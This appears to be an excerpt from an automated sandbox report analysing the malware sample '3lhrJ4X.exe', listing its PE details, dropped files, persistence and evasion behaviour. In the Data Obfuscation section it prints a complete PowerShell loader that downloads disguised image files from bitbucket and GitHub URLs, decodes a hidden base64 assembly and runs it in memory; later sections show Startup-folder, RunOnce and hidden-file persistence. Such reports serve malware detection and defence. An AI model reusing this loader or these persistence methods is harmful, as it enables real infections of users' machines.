                  Source: 3lhrJ4X.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 3lhrJ4X.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 3lhrJ4X.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: wextract.pdb source: 3lhrJ4X.exe
                  Source: Binary string: wextract.pdbGCTL source: 3lhrJ4X.exe
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.dr
                  Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 00000006.00000002.1823051072.000001D3B4030000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdbG_a_ S__CorExeMainmscoree.dll source: powershell.exe, 00000006.00000002.1823051072.000001D3B4030000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.6\Bot\LiteHTTP\obj\x86\Debug\Anubis.pdb source: powershell.exe, 00000006.00000002.1823716932.000001D3BBA89000.00000004.00000800.00020000.00000000.sdmp
                  Source: 3lhrJ4X.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: 3lhrJ4X.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: 3lhrJ4X.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: 3lhrJ4X.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: 3lhrJ4X.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $dosigo = '[Base64-encoded payload]...
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '[Base64-encoded payload]...
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                  Source: 3lhrJ4X.exe Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Code function: 0_2_00007FF761F71D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF761F71D28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_012E8D8A pushad ; ret 8_2_012E8D99

                  Persistence and Installation Behavior

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: attrib.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\windows portable devices.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\msbuild.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\windowspowershell.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\windows multimedia platform.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\windows sidebar.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\autoit3.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\microsoft.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\windows photo viewer.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\microsoft office.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\microsoft.net.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\java.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\google.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\microsoft onedrive.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\windows nt.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\common files.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\windows defender.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\internet explorer.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\windows mail.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\msecache.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\windows media player.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\reference assemblies.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\jdownloader.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\OneDrive\mozilla maintenance service.exe
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Code function: 0_2_00007FF761F71684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF761F71684

                  Boot Survival

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "Msbuild"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Msbuild.lnk
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 12E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2FB0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2F00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 11D0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2D80000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2AF0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 7A0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2400000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: A20000 memory reserve | memory write watch
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1383Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2007Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3124Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6686Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3471Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6339Jump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2345
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7988Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 3124 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 6686 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -39830s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -39705s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -39580s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -39455s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -39330s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -39205s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -39080s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38955s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38830s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38705s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38580s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38455s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38330s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38205s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -38080s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37955s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37832s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37705s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37580s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37455s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37330s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37209s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -37080s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36955s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36830s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36705s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36580s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36445s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36330s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36205s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -36080s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35955s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35830s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35715s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35596s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35471s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35346s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35221s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -35096s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34971s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34846s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34726s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34612s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34487s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34362s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34237s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -34112s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -33987s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -33862s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7380Thread sleep time: -33737s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2536Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5868Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F7204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF761F7204C
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F764E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF761F764E4
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39830Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39705Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39580Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39455Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39330Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39205Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39080Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38955Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38830Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38705Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38580Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38455Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38330Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38205Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38080Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37955Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37832Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37705Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37580Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37455Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37330Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37209Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 37080Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36955Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36830Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36705Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36580Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36445Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36330Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36205Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 36080Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35955Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35830Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35715Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35596Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35471Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35346Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35221Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35096Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34971Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34846Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34726Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34612Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34487Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34362Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34237Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34112Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33987Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33862Jump to behavior
